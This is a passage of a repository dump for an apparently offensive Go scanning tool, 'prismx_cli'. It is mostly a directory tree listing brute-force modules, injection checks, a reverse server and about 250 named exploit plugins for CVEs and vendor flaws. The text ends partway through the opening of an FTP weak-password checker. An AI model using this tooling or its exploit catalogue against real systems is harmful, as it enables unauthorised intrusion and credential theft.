├── .idea
├── .gitignore
├── misc.xml
├── modules.xml
├── prismx_cli.iml
└── vcs.xml
├── LICENSE
├── README.md
├── README_CN.md
├── core
├── aliveCheck
│ ├── host.go
│ └── port.go
├── hydra
│ ├── check.go
│ ├── ftp.go
│ ├── memcached.go
│ ├── mongodb.go
│ ├── mssql.go
│ ├── mysql.go
│ ├── oracle.go
│ ├── postgres.go
│ ├── rdp.go
│ ├── redis.go
│ ├── smb.go
│ ├── snmp.go
│ ├── ssh.go
│ ├── telnet.go
│ ├── vnc.go
│ ├── winrm.go
│ └── zookeeper.go
├── jsFind
│ ├── find.go
│ └── rules.yaml
├── models
│ ├── params.go
│ └── plugin.go
├── owaspTop10
│ ├── Core.go
│ ├── fileIncloud
│ │ └── start.go
│ ├── sqli
│ │ ├── data
│ │ │ └── errors.xml
│ │ └── start.go
│ ├── utils
│ │ └── utils.go
│ └── xss
│ │ └── start.go
├── plugins
│ ├── exploits
│ │ ├── 360_TianQing_ccid_SQL_injectable.yaml
│ │ ├── 360_Tianqing_database_information_disclosure.yaml
│ │ ├── 74cms_5.0.1_前台SQL注入.yaml
│ │ ├── ACTI_Camera_images_File_read.yaml
│ │ ├── Active_UC_index.action_远程命令执行漏洞.yaml
│ │ ├── Adslr_Enterprise_online_behavior_management_system_Information_leakage.yaml
│ │ ├── Alibaba_Canal_Default_Password.yaml
│ │ ├── Alibaba_Canal_Info_Leak.yaml
│ │ ├── Alibaba_Nacos_控制台默认弱口令.yaml
│ │ ├── Apach_Solr_File_Read.yaml
│ │ ├── Apache Kylin Console 控制台弱口令.yaml
│ │ ├── Apache Kylin Unauthorized configuration disclosure (CVE-2020-13937).yaml
│ │ ├── Apache_ActiveMQ默认密码.yaml
│ │ ├── Apache_Active_MQ_RCE.go
│ │ ├── Apache_Cocoon_Xml_注入_CVE-2020-11991.yaml
│ │ ├── Apache_Flink_Upload_RCE.yaml
│ │ ├── Apache_HTTP_Server_路径穿越漏洞.yaml
│ │ ├── Apache_Kylin的未授权配置泄露漏洞.yaml
│ │ ├── Apache_Ofbiz_CVE-2018-8033-XXE.yaml
│ │ ├── Apache_Ofbiz_XMLRPC_RCE漏洞CVE-2020-9496.yaml
│ │ ├── Apache_RocketMQ_RCE CVE-2023-33246.go
│ │ ├── Apache目录穿越漏洞_CVE-2021-41773.yaml
│ │ ├── Aspcms_backend_leak.yaml
│ │ ├── Atlassian Jira 信息泄露漏洞 CVE-2020-14181.yaml
│ │ ├── Atlassian_Confluence_信息泄露漏洞.yaml
│ │ ├── CVE-2018-1000110 用户枚举.yaml
│ │ ├── CVE-2018-1000861 Jenkins远程代码执行.yaml
│ │ ├── CVE-2019-1003000 Jenkins远程代码执行.yaml
│ │ ├── CVE-2021-22205_GitLab_未授权RCE.yaml
│ │ ├── CVE-2021-41277_Metabase_任意文件读取.yaml
│ │ ├── CVE-2023-25157-GeoServer SQL 注入漏洞.go
│ │ ├── Cacti_Weathermap_File_Write.yaml
│ │ ├── China_Mobile_Yu_routed_the_login_bypass.yaml
│ │ ├── Cisco_CVE-2020-3452_Read_File.yaml
│ │ ├── Citrix_CVE-2020-8193_Unauthorized.yaml
│ │ ├── Citrix_Cve-2020-8191-XSS.yaml
│ │ ├── ClusterEngineV4.0 RCE (CVE-2020-21224).yaml
│ │ ├── ClusterEngine_V4_0_Shell_cluster_RCE.yaml
│ │ ├── Confluence_未授权_RCE_CVE-2019-3396.yaml
│ │ ├── Coremail邮件系统配置文件信息泄露.yaml
│ │ ├── D-Link AC集中管理系统默认弱口令.yaml
│ │ ├── DLink_CVE-2020-25078_Account_Disclosure.yaml
│ │ ├── Docker_Api_Unauthorized_Rce.yaml
│ │ ├── Docker_Registry_Api_Unauth.yaml
│ │ ├── Druid_Monitor_Unauth.yaml
│ │ ├── Drupal_CVE-2014-3704-sqli.yaml
│ │ ├── Drupal_CVE-2018-7600_RCE.yaml
│ │ ├── Ecshop_CNVD-2020-58823-SQLI.yaml
│ │ ├── ElasticSearch_api_未授权访问.yaml
│ │ ├── Exchange_CVE-2021-26855-SSRF.yaml
│ │ ├── F5_BIG-IP代码执行漏(CVE-2021-22986).yaml
│ │ ├── F5_Tmui_CVE-2020-5902_RCE.yaml
│ │ ├── FineReport v8.0 Arbitrary file read.yaml
│ │ ├── FineReport(帆软)报表系统目录遍历漏洞.yaml
│ │ ├── Finetree-5MP-摄像机 默认口令 未授权任意用户添加.yaml
│ │ ├── Gitlab_CNVD-2021-14193_InfoLeak.yaml
│ │ ├── Grafana未授权任意文件读取漏洞.go
│ │ ├── HIBOS酒店宽带运营系统存在命令执行漏洞.yaml
│ │ ├── HIKVISION 视频编码设备接入网关 任意文件下载.yaml
│ │ ├── HanWang Time Attendance SQL injection.yaml
│ │ ├── Hikvision_iVMS_resourceOperations接口文件上传.go
│ │ ├── JBoss-CVE-2017-12149.yaml
│ │ ├── Jenkins未授权访问.yaml
│ │ ├── JingHe OA C6 Default password.yaml
│ │ ├── JingHe OA download.asp File read.yaml
│ │ ├── Joomla_contushdvideoshare_任意文件读取漏洞.yaml
│ │ ├── Joomla_departments_SQL注入.yaml
│ │ ├── Kingdee EAS server_file Directory traversal.yaml
│ │ ├── Kingsoft V8 Default weak password.yaml
│ │ ├── Kyan 网络监控设备 run.php 远程命令执行漏洞.yaml
│ │ ├── Kyan网络监控设备账号密码泄露漏洞.yaml
│ │ ├── LanhaiZuoyue system debug.php RCE.yaml
│ │ ├── LanhaiZuoyue system download.php File read.yaml
│ │ ├── Lanproxy 目录遍历漏洞 CVE-2021-3019.yaml
│ │ ├── MS17010.go
│ │ ├── MessageSolution 邮件归档系统EEA 信息泄露漏洞 CNVD-2021-10543.yaml
│ │ ├── Meta_CRM5客户关系管理系统文件上传漏洞.yaml
│ │ ├── Portainer为创建用户导致未授权访问(CVE-2018-19367).yaml
│ │ ├── Ruijie smartweb password information disclosure.yaml
│ │ ├── Ruijie smartweb weak password.yaml
│ │ ├── RuoYi Druid Unauthorized access.yaml
│ │ ├── SDWAN智能网关应用系统弱口令.yaml
│ │ ├── Samsung WLAN AP WEA453e RCE.yaml
│ │ ├── Seeyon OA A6 DownExcelBeanServlet User information leakage.yaml
│ │ ├── Seeyon OA A6 createMysql.jsp Disclosure of database sensitive information.yaml
│ │ ├── Seeyon OA A6 initDataAssess.jsp User information leakage.yaml
│ │ ├── Seeyon OA A6 setextno.jsp SQL injection.yaml
│ │ ├── Seeyon OA A8-m Information leakage.yaml
│ │ ├── Selea OCR-ANPR get_file.php File read.yaml
│ │ ├── Shiro_RCE_CVE_2016_4437.go
│ │ ├── ShopXO download File read (CNVD-2021-15822).yaml
│ │ ├── ShowDoc_任意文件上传漏洞.yaml
│ │ ├── SmbGhost_Vulnerable_CVE-2020-0796.go
│ │ ├── SonicWall SSL-VPN 远程命令执行漏洞.yaml
│ │ ├── Spring_Cloud_Gateway_CVE_2022_22947.yaml
│ │ ├── Springboot RCE CVE-2022-22965.yaml
│ │ ├── Swagger UI document leaked.go
│ │ ├── TamronOS IPTV系统后台任意文件下载.yaml
│ │ ├── Tomcat_AJP任意文件读取漏洞_CVE-2020-1938.go
│ │ ├── Tomcat_manager_WeakPassword.go
│ │ ├── Tomcat代码执行漏洞(CVE-2017-12615).yaml
│ │ ├── VMWare Operations vRealize Operations Manager API SSRF CVE-2021-21975.yaml
│ │ ├── VMware_vCenter远程代码执行漏洞.yaml
│ │ ├── WangKang NS-ASG cert_download.php File read.yaml
│ │ ├── Weaver OA 8 SQL injection.yaml
│ │ ├── Weaver_e_cology_OA_XStream_Remote_Code_Execution.yaml
│ │ ├── Weblogic LDAP RCE CVE-2021-2109.yaml
│ │ ├── Weblogic SSRF漏洞 CVE-2014-4210.yaml
│ │ ├── XXL-JOB Default password.yaml
│ │ ├── Xieda-oa文件读取路段.yaml
│ │ ├── Yinpeng Hanming Video Conferencing Arbitrary file read (CNVD-2020-62437).yaml
│ │ ├── Zabbix登录绕过漏洞(CVE-2022-23131).yaml
│ │ ├── _通天星_cmsv6_车载视频监控平台_disable_存在_sql_注入漏洞.yaml
│ │ ├── activemq_远程代码执行漏洞_(cve-2016-3088).yaml
│ │ ├── adselfservice_plus_rce_cve-2021-40539.yaml
│ │ ├── apache_airflow_unauthorized.yaml
│ │ ├── apache_apisix_dashboard_rce_cve-2021-45232.yaml
│ │ ├── apache_druid_abritrary_file_read_cve-2021-36749.yaml
│ │ ├── apache_http_server_arbitrary_file_read(cve-2021-41773).yaml
│ │ ├── citrix-cve-2019-19781-path-traversal.yaml
│ │ ├── citrix-xenmobile-cve-2020-8209.yaml
│ │ ├── cnvd-2021-49104.yaml
│ │ ├── coldfusion-cve-2010-2861-lfi.yaml
│ │ ├── confluence-cve-2021-26084.yaml
│ │ ├── confluence_远程代码执行漏洞-cve-2023-22527.yaml
│ │ ├── consul-rexec-rce.yaml
│ │ ├── consul-service-rce.yaml
│ │ ├── couchcms-cve-2018-7662.yaml
│ │ ├── couchdb-cve-2017-12635_垂直越权漏洞.yaml
│ │ ├── couchdb-unauth.yaml
│ │ ├── craftcms-seomatic-cve-2020-9757-rce.yaml
│ │ ├── cve-2017-10271_weblogic_xmldecoder反序列化漏洞.yaml
│ │ ├── cve-2021-3129-laravel_debug_mod_rce.yaml
│ │ ├── cve-2021-3223_node-red_任意文件读取.yaml
│ │ ├── cve-2022-22965:spring_framework远程代码执行漏洞.yaml
│ │ ├── cve-2023-22505_账户权限提升漏洞.yaml
│ │ ├── cve-2023-28432_minio信息泄露.yaml
│ │ ├── cve-2023-6895-海康威视对讲广播系统远程命令执行漏洞.yaml
│ │ ├── cve-2024-36401-geoserver远程代码执行漏洞.yaml
│ │ ├── dlink-cve-2020-9376-dump-credentials.yaml
│ │ ├── ecologyoa_clusterupgrade_-_upload.yaml
│ │ ├── ezOffice_万户OA文件上传.yaml
│ │ ├── ezoffice-oa-officeserver_jsp文件上传漏洞.yaml
│ │ ├── fahuo100_sql_injection_CNVD_2021_30193.yaml
│ │ ├── fastJson.go
│ │ ├── hikvision_isecure_center综合安防管理平台存在文件上传漏洞.yaml
│ │ ├── hikvision_rce_cve-2021-36260.yaml
│ │ ├── hikvision_report接口任意文件上传漏洞.yaml
│ │ ├── jeecg-boot系统接口jmlink权限绕过漏洞.yaml
│ │ ├── jeecgboot_testconnection_ssti模板注入远程命令执行漏洞.yaml
│ │ ├── jeecg任意文件上传漏洞.yaml
│ │ ├── jmx-console控制台未授权访问漏洞.yaml
│ │ ├── journyx项目管理软件_soap_cgi_pyc_xxe漏洞.yaml
│ │ ├── kingdeeerp-unserialize-rce.yaml
│ │ ├── kkfileview_任意文件读取.yaml
│ │ ├── landray-OA-Arbitrary-file-read.yaml
│ │ ├── log4j2_RCE_CVE-2021-44228.go
│ │ ├── nacos未授权访问漏洞-cve-2021-29441.yaml
│ │ ├── phpmyadmin_反序列化漏洞.yaml
│ │ ├── phpunit CVE_2017_9841 远程代码执行.yaml
│ │ ├── qvd-2023-13615畅捷通t_远程代码执行漏洞.yaml
│ │ ├── seeyon常见后门.yaml
│ │ ├── servicenow_ui_jelly模板注入(cve-2024-4879).yaml
│ │ ├── spring_cloud_gateway_远程代码执行漏洞(cve-2022-22947).yaml
│ │ ├── synway-网关管理软件debug_php远程代码执行漏洞.yaml
│ │ ├── wanhu_oa_smartupload_jsp_-_arbitrary_file_upload.yaml
│ │ ├── weaver_e-cology_beanshell_-_remote_command_execution.yaml
│ │ ├── weaver_e-office_v9_5_-_arbitrary_file_upload.yaml
│ │ ├── weblogic_任意文件上传漏洞.yaml
│ │ ├── weblogic任意文件上传漏洞(cve-2018-2894).yaml
│ │ ├── wih.go
│ │ ├── yapi_rce.yaml
│ │ ├── zabbix_默认账户漏洞.yaml
│ │ ├── 万户协同办公平台未授权访问漏洞.yaml
│ │ ├── 世邦ip网络对讲广播系统登录绕过.yaml
│ │ ├── 中国移动 禹路由 敏感信息泄露漏洞.yaml
│ │ ├── 中科网威、锐捷、网域多个设备的防火墙控制系统 存在账号密码泄露.yaml
│ │ ├── 主动安全监控云平台存在任意文件读取漏洞.yaml
│ │ ├── 亿邮电子邮件系统远程命令执行.yaml
│ │ ├── 华天动力协同oa任意文件上传漏洞.yaml
│ │ ├── 友_grp-u8_uploadfiledata-任意文件上传漏洞.yaml
│ │ ├── 大华DSS系统 任意文件下载漏洞.yaml
│ │ ├── 大华dss账号密码泄露.yaml
│ │ ├── 大华智慧园区_前台_poi_文件上传.yaml
│ │ ├── 大华智慧园区综合管理平台.yaml
│ │ ├── 大华智慧园区综合管理平台_user_getuserinfobyusername_action_账号密码泄漏漏洞.yaml
│ │ ├── 大华智慧园区综合管理平台publishing任意文件上传漏洞.yaml
│ │ ├── 大华智慧园区综合管理平台任意密码读取漏洞.yaml
│ │ ├── 大华智慧园区综合管理平台文件上传漏洞(cve-2023-3836).yaml
│ │ ├── 大华智能物联综合管理平台justfortest用户登录漏洞.yaml
│ │ ├── 天融信上网行为管理系统系统某接口_rce.yaml
│ │ ├── 奇安信_vpn_未授权管理用户遍历及任意账号密码修改.yaml
│ │ ├── 契约锁电子签章平台_add_远程命令执行漏洞.yaml
│ │ ├── 安恒明御安全网关命令执行漏洞.yaml
│ │ ├── 宝塔_7.42版本_pma未授权漏洞.yaml
│ │ ├── 户oa_filetest文件上传.yaml
│ │ ├── 明御安全网关存在任意文件读取漏洞.yaml
│ │ ├── 极通EWEBSphpinfo泄露.yaml
│ │ ├── 极通EWEBS任意文件读取.yaml
│ │ ├── 泛微_e-cology_ktreeuploadaction_任意文件上传漏洞.yaml
│ │ ├── 泛微_e-office_10_officeserver_任意文件上传漏洞.yaml
│ │ ├── 泛微e-cology9_sql注入-cnvd-2023-12632.yaml
│ │ ├── 泛微e-mobile_命令执行漏洞.yaml
│ │ ├── 泛微e-mobile命令执行漏洞.yaml
│ │ ├── 泛微oa_e-office平台uploadify_php任意文件上传漏洞.yaml
│ │ ├── 泛微oa_fileupload任意文件上传漏洞.yaml
│ │ ├── 泛微oa存在未授权任意文件上传漏洞_攻击者可直接上传任意文件_进而控制服务器_.yaml
│ │ ├── 泛微移动管理平台e-mobile_lang2sql接口存在任意文件上传.yaml
│ │ ├── 海康威视_综合安防管理平台_keepalive接口_远程代码执行漏洞.yaml
│ │ ├── 海康威视综合安防管理平台_前台rce.yaml
│ │ ├── 海康威视综合安防管理平台信息泄露漏洞.yaml
│ │ ├── 深信服 行为感知系统 c.php 远程命令执行漏洞.yaml
│ │ ├── 瑞斯康达-多业务智能网关-rce.yaml
│ │ ├── 用友-nc-cloud-blobrefclasssea反序列化.yaml
│ │ ├── 用友-时空ksoa_imageupload_任意文件上传漏洞.yaml
│ │ ├── 用友NC_BeanShell远程代码执行漏洞.yaml
│ │ ├── 用友_U8_OA_test.jsp文件_SQL注入.yaml
│ │ ├── 用友_nc_cloud_jsinvoke_任意文件上传.yaml
│ │ ├── 用友_nc_cloud_uploadchunk_任意文件上传.yaml
│ │ ├── 用友_nc_uploadcontrol_uploadfile_任意文件上传漏洞.yaml
│ │ ├── 用友_u8_crm客户关系管理系统_getemaildata_php_任意文件上传漏洞复现.yaml
│ │ ├── 用友grp-u8_bx_historydatacheck_sql注入漏洞.yaml
│ │ ├── 用友grp-u8_u8appproxy任意文件上传漏洞.yaml
│ │ ├── 用友nc6_5反序列化文件上传漏洞.yaml
│ │ ├── 用友nc_accept_jsp任意文件上传漏洞.yaml
│ │ ├── 用友nc_mp模块文件上传漏洞分析.yaml
│ │ ├── 用友nc_uapim接口处存在任意文件上传漏洞.yaml
│ │ ├── 用友u8_crm_swfupload_任意文件上传漏洞复现(xve-2024-8597).yaml
│ │ ├── 用友u8_uploadfiledata任意文件上传.yaml
│ │ ├── 用友u8c_fileservlet_任意文件读取漏洞.yaml
│ │ ├── 用友u8c文件上传漏洞.yaml
│ │ ├── 用友时空ksoa_attachment_文件上传漏洞.yaml
│ │ ├── 用友致远u8-oa_getsessionlist_jsp信息泄露.yaml
│ │ ├── 畅捷通t__sql注入漏洞(qvd-2023-13612).yaml
│ │ ├── 网康下一代防火墙RCE.yaml
│ │ ├── 网神secgate_3600防火墙文件上传.yaml
│ │ ├── 致远OA webmail.do任意文件下载 CNVD-2020-62422.yaml
│ │ ├── 致远a8任意文件写入漏洞(cnvd-2019-19299).yaml
│ │ ├── 致远m1_usertokenservice_反序列化rce漏洞.yaml
│ │ ├── 致远oa_a6_存在数据库敏感信息泄露.yaml
│ │ ├── 致远oa_ajax_do未授权上传(cnvd_2021_01627).yaml
│ │ ├── 致远互联analyticscloud_分析云_任意文件读取.yaml
│ │ ├── 致远伪0day-fastjson.yaml
│ │ ├── 致远报表密码泄露.yaml
│ │ ├── 蓝凌_oa_金格组件任意文件上传漏洞.yaml
│ │ ├── 蓝凌oa_custom_jsp_任意文件读取漏洞.yaml
│ │ ├── 蓝凌oa_sysuicomponent_任意文件上传漏洞.yaml
│ │ ├── 蓝凌oa_treexml_tmpl_远程命令执行漏洞.yaml
│ │ ├── 蓝凌oa_文件copy导致远程代码执行.yaml
│ │ ├── 蜂网互联 企业级路由器v4.31 密码泄露漏洞 CVE-2019-16313.yaml
│ │ ├── 通达oa_ispirit存在后台任意文件上传漏洞.yaml
│ │ ├── 通达oa_v2017_action_upload任意文件上传漏洞.yaml
│ │ ├── 通达oa未授权访问.yaml
│ │ ├── 金和editeprint_aspx文件上传漏洞.yaml
│ │ ├── 金和oa_jc6_ntko-upload_任意文件上传漏洞复现.yaml
│ │ ├── 金和oa_jc6任意文件上传.yaml
│ │ ├── 金山 V8终端安全系统任意文件下载漏洞.yaml
│ │ ├── 锐捷NBR路由器 EWEB网管系统 远程命令执行漏洞.yaml
│ │ └── 锐捷RG-UAC 账户硬编码漏洞.yaml
│ └── initialize.go
├── subdomain
│ ├── passive
│ │ ├── passive.go
│ │ └── sources.go
│ ├── runner
│ │ └── runner.go
│ └── subscraping
│ │ ├── agent.go
│ │ ├── sources
│ │ ├── alienvault
│ │ │ └── alienvault.go
│ │ ├── anubis
│ │ │ └── anubis.go
│ │ ├── archiveis
│ │ │ └── archiveis.go
│ │ ├── commoncrawl
│ │ │ └── commoncrawl.go
│ │ ├── crtsh
│ │ │ └── crtsh.go
│ │ ├── dnsdumpster
│ │ │ └── dnsdumpster.go
│ │ ├── fofa
│ │ │ └── fofa.go
│ │ ├── fullhunt
│ │ │ └── fullhunt.go
│ │ ├── hackertarget
│ │ │ └── hackertarget.go
│ │ ├── hunter
│ │ │ └── hunter.go
│ │ ├── rapiddns
│ │ │ └── rapiddns.go
│ │ ├── riddler
│ │ │ └── riddler.go
│ │ ├── shodan
│ │ │ └── shodan.go
│ │ ├── sitedossier
│ │ │ └── sitedossier.go
│ │ ├── sonarsearch
│ │ │ └── sonarsearch.go
│ │ ├── sublist3r
│ │ │ └── subllist3r.go
│ │ ├── threatbook
│ │ │ └── threatbook.go
│ │ ├── threatcrowd
│ │ │ └── threatcrowd.go
│ │ ├── threatminer
│ │ │ └── threatminer.go
│ │ ├── virustotal
│ │ │ └── virustotal.go
│ │ ├── waybackarchive
│ │ │ └── waybackarchive.go
│ │ └── zoomeye
│ │ │ └── zoomeye.go
│ │ └── types.go
└── vulnerability
│ ├── app.go
│ └── verify.go
├── go.mod
├── go.sum
├── images
├── img.png
├── scan.png
├── wx.jpg
└── wx_qrcode.jpg
├── main.go
├── prismx_cli.iml
├── scan
├── func.go
└── task.go
└── utils
├── arr
└── utils.go
├── cryptoPlus
├── aes.go
├── base64.go
├── bcrypt.go
├── encoding.go
├── md5.go
├── rsa.go
├── sha256.go
└── tls.go
├── file
└── local.go
├── font
└── fontColor.go
├── global.go
├── go-ora
├── advanced_nego
│ ├── advanced_nego.go
│ ├── auth_service.go
│ ├── comm.go
│ ├── data_integrity_service.go
│ ├── default_service.go
│ ├── encrypt_service.go
│ ├── ntlmssp
│ │ ├── authenticate_message.go
│ │ ├── authheader.go
│ │ ├── avids.go
│ │ ├── challenge_message.go
│ │ ├── messageheader.go
│ │ ├── negotiate_flags.go
│ │ ├── negotiate_message.go
│ │ ├── nlmp.go
│ │ ├── unicode.go
│ │ ├── varfield.go
│ │ └── version.go
│ ├── nts.go
│ └── supervisor_service.go
├── auth_object.go
├── bfile.go
├── bulk_copy.go
├── command.go
├── connection.go
├── connection_string.go
├── converters
│ ├── generatefloat
│ │ └── main.go
│ ├── max_len.go
│ ├── oracle_number.go
│ ├── oracle_number_test.go
│ ├── other_types.go
│ ├── other_types_test.go
│ ├── string_conversion.go
│ ├── string_conversion_new.go
│ ├── testfloatsvalues.go
│ ├── type_conversion.go
│ └── type_conversion_test.go
├── custom_types.go
├── data_set.go
├── data_type_nego.go
├── db_version.go
├── driver.go
├── lob.go
├── network
│ ├── accept_packet.go
│ ├── address_resolution.go
│ ├── connect_option.go
│ ├── connect_option_test.go
│ ├── connect_packet.go
│ ├── data_packet.go
│ ├── marker_packet.go
│ ├── net_others.go
│ ├── net_windows.go
│ ├── oracle_error.go
│ ├── packets.go
│ ├── redirect_packet.go
│ ├── refuse_packet.go
│ ├── security
│ │ ├── des_cryptor.go
│ │ ├── general.go
│ │ ├── md4
│ │ │ ├── md4.go
│ │ │ └── md4block.go
│ │ └── rc4_cryptor.go
│ ├── session.go
│ ├── session_ctx.go
│ └── summary_object.go
├── oracletype_string.go
├── parameter.go
├── parameter_decode_array.go
├── parameter_encode.go
├── parameter_encode_array.go
├── ref_cursor.go
├── rowid.go
├── simple_object.go
├── tcp_protocol_nego.go
├── timestamp.go
├── timestampTZ.go
├── trace
│ ├── trace.go
│ └── trace.go-e
├── transaction.go
├── udt.go
├── urowid.go
├── utils.go
├── wallet.go
├── wallet_algo.go
└── wallet_utils.go
├── go-rdp
├── core
│ ├── io.go
│ ├── rle.go
│ ├── socket.go
│ ├── types.go
│ └── util.go
├── emission
│ └── emitter.go
└── protocol
│ ├── lic
│ └── lic.go
│ ├── nla
│ ├── cssp.go
│ ├── encode.go
│ └── ntlm.go
│ ├── pdu
│ ├── caps.go
│ ├── cliprdr.go
│ ├── data.go
│ └── pdu.go
│ ├── rfb
│ └── rfb.go
│ ├── sec
│ └── sec.go
│ ├── t125
│ ├── ber
│ │ └── ber.go
│ ├── gcc
│ │ └── gcc.go
│ ├── mcs.go
│ └── per
│ │ └── per.go
│ ├── tpkt
│ └── tpkt.go
│ └── x224
│ └── x224.go
├── go-snmp
├── decode.go
├── gosnmp.go
├── helper.go
└── packet.go
├── go-telnet
└── telnet.go
├── go-vnc
├── go
│ └── metrics
│ │ └── metrics.go
├── handshake.go
├── security.go
└── vncclient.go
├── httpResult
└── return.go
├── interactsh
└── pkg
│ ├── client
│ └── client.go
│ ├── options
│ └── session-info.go
│ ├── server
│ ├── http_server.go
│ ├── server.go
│ └── util.go
│ └── storage
│ ├── error.go
│ ├── storage.go
│ └── types.go
├── logger
├── color
│ └── color.go
└── log.go
├── netUtils
├── body.go
├── scraper.go
└── tcp.go
├── parse
├── ParseIP.go
└── parsePort.go
├── proxyPool
└── pool.go
├── putils
├── async
│ ├── async.go
│ └── async_test.go
├── batcher
│ ├── batcher.go
│ ├── batcher_test.go
│ └── doc.go
├── buffer
│ └── disk.go
├── channelutil
│ ├── README.md
│ ├── clone.go
│ ├── clone_join_test.go
│ ├── join.go
│ └── utils.go
├── conn
│ └── connpool
│ │ ├── inflight.go
│ │ └── onetimepool.go
├── consts
│ └── errors.go
├── context
│ ├── NContext.go
│ ├── Ncontext_test.go
│ ├── context.go
│ └── context_test.go
├── conversion
│ ├── conversion.go
│ └── conversion_test.go
├── crypto
│ ├── README.md
│ ├── hash.go
│ ├── hash_test.go
│ ├── jarm
│ │ └── jarm.go
│ ├── tls.go
│ └── ztls.go
├── dedupe
│ ├── dedupe.go
│ ├── dedupe_test.go
│ ├── leveldb.go
│ └── map.go
├── env
│ └── env.go
├── errors
│ ├── enriched.go
│ ├── err_with_fmt.go
│ ├── errinterface.go
│ ├── errlevel.go
│ └── errors.go
├── exec
│ ├── README.md
│ ├── executil.go
│ └── executil_test.go
├── file
│ ├── README.md
│ ├── clean.go
│ ├── clean_test.go
│ ├── file.go
│ ├── file_test.go
│ └── tests
│ │ ├── empty_lines.txt
│ │ ├── path-traversal.txt
│ │ ├── pipe_separator.txt
│ │ └── standard.txt
├── folder
│ ├── README.md
│ ├── folderutil.go
│ ├── folderutil_linux_test.go
│ ├── folderutil_test.go
│ ├── folderutil_win_test.go
│ └── std_dirs.go
├── generic
│ ├── generic.go
│ ├── generic_test.go
│ ├── lockable.go
│ └── lockable_test.go
├── healthcheck
│ ├── connection.go
│ ├── connection_test.go
│ ├── dns.go
│ ├── dns_test.go
│ ├── environment.go
│ ├── environment_test.go
│ ├── healthcheck.go
│ ├── path_permission.go
│ └── path_permission_test.go
├── http
│ ├── README.md
│ ├── chain.go
│ ├── httputil.go
│ ├── httputil_test.go
│ ├── internal.go
│ ├── normalization.go
│ ├── respChain.go
│ └── response.go
├── ip
│ ├── README.md
│ ├── iputil.go
│ └── iputil_test.go
├── maps
│ ├── README.md
│ ├── generic_map.go
│ ├── mapsutil.go
│ ├── ordered_map.go
│ └── synclock_map.go
├── memguardian
│ ├── README.MD
│ ├── doc.go
│ ├── memguardian.go
│ ├── memory.go
│ ├── memory_linux.go
│ └── memory_others.go
├── ml
│ ├── metrics
│ │ ├── classification_report.go
│ │ └── confusion_matrix.go
│ ├── model_selection
│ │ └── model_selection.go
│ ├── naive_bayes
│ │ ├── naive_bayes_classifier.go
│ │ └── naive_bayes_classifier_test.go
│ └── types.go
├── net
│ ├── net.go
│ └── net_test.go
├── os
│ ├── arch.go
│ └── os.go
├── patterns
│ ├── doc.go
│ ├── patterns.go
│ └── patterns_test.go
├── permission
│ ├── README.md
│ ├── error.go
│ ├── permission.go
│ ├── permission_file.go
│ ├── permission_file_test.go
│ ├── permission_linux.go
│ ├── permission_other.go
│ ├── permission_test.go
│ └── permission_win.go
├── ports
│ ├── ports.go
│ └── ports_test.go
├── pprof
│ ├── README.md
│ └── pprof.go
├── process
│ ├── docker.go
│ └── process.go
├── proxy
│ ├── README.md
│ ├── burp.go
│ ├── proxy.go
│ └── proxy_test.go
├── ptr
│ ├── ptr.go
│ └── ptr_test.go
├── race
│ ├── README.md
│ ├── norace.go
│ └── race.go
├── rand
│ ├── number.go
│ └── number_test.go
├── reader
│ ├── conn_read.go
│ ├── conn_read_test.go
│ ├── error.go
│ ├── examples
│ │ └── keypress
│ │ │ ├── buffered
│ │ │ └── keypress.go
│ │ │ └── raw
│ │ │ └── keypress.go
│ ├── frozen_reader.go
│ ├── frozen_reader_test.go
│ ├── rawmode
│ │ ├── raw_mode.go
│ │ ├── raw_mode_posix.go
│ │ ├── raw_mode_windows.go
│ │ ├── values_darwin.go
│ │ └── values_linux.go
│ ├── reader_keypress.go
│ ├── reusable_read_closer.go
│ ├── reusable_read_closer_test.go
│ ├── timeout_reader.go
│ └── timeout_reader_test.go
├── reflect
│ ├── README.md
│ ├── reflectutil.go
│ ├── reflectutil_test.go
│ └── tests
│ │ └── tests.go
├── routing
│ ├── router.go
│ ├── router_darwin.go
│ ├── router_linux.go
│ └── router_windows.go
├── scripts
│ ├── README.md
│ └── versionbump
│ │ ├── versionbump.go
│ │ └── versionbump_test.go
├── slice
│ ├── README.md
│ ├── sliceutil.go
│ └── sliceutil_test.go
├── strings
│ ├── README.md
│ ├── strings_encoding.go
│ ├── strings_normalize.go
│ ├── stringsutil.go
│ └── stringsutil_test.go
├── structs
│ └── structs.go
├── sync
│ ├── adaptivewaitgroup.go
│ ├── semaphore
│ │ └── semaphore.go
│ └── sizedpool
│ │ ├── sizedpool.go
│ │ └── sizedpool_test.go
├── syscallutil
│ ├── syscall_unix.go
│ ├── syscall_unix_others.go
│ ├── syscallutil.go
│ ├── syscallutil_test.go
│ └── syscallutil_win.go
├── time
│ ├── README.md
│ ├── timeutil.go
│ └── timeutil_test.go
├── trace
│ ├── trace.go
│ └── trace_test.go
├── update
│ ├── types.go
│ ├── update.go
│ ├── utils_all.go
│ └── utils_linux.go
└── url
│ ├── README.md
│ ├── merge_test.go
│ ├── orderedparams.go
│ ├── orderedparams_test.go
│ ├── parsers.go
│ ├── rawparam.go
│ ├── rawparam_test.go
│ ├── url.go
│ ├── url_test.go
│ └── utils.go
├── randomUtils
├── codec.go
├── generator.go
├── rand.go
└── uuid.go
├── reverse
└── server.go
├── task
└── pool.go
└── temp
└── cel.go
/.idea/.gitignore:
--------------------------------------------------------------------------------
1 | # 默认忽略的文件
2 | /shelf/
3 | /workspace.xml
4 | # 基于编辑器的 HTTP 客户端请求
5 | /httpRequests/
6 | # Datasource local storage ignored files
7 | /dataSources/
8 | /dataSources.local.xml
9 |
--------------------------------------------------------------------------------
/.idea/misc.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/.idea/modules.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
--------------------------------------------------------------------------------
/.idea/prismx_cli.iml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
--------------------------------------------------------------------------------
/.idea/vcs.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/core/hydra/ftp.go:
--------------------------------------------------------------------------------
1 | package hydra
2 |
3 | import (
4 | "github.com/jlaffaye/ftp"
5 | "net"
6 | "prismx_cli/core/models"
7 | "prismx_cli/utils/netUtils"
8 | )
9 |
10 | func FtpWeakPass(res any) any {
11 |
12 | var (
13 | t = res.(models.HydraTask)
14 | msg = models.MSG{
15 | Name: "FTP WeakPassword",
16 | Type: "WeakPassword",
